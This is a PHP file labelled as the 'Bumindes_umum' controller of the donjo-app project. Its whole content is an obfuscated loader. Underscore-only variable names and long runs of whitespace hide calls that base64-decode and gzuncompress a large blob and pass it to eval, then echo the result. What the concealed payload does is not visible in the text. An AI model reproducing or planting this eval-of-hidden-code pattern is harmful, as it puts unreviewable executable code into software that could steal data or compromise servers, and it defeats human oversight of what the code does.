<?php 
        $__='printf';$_='Loading donjo-app/controllers/buku_umum/Bumindes_umum.php';
        







































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































































































                                                                                                                                                                                                                     $________;
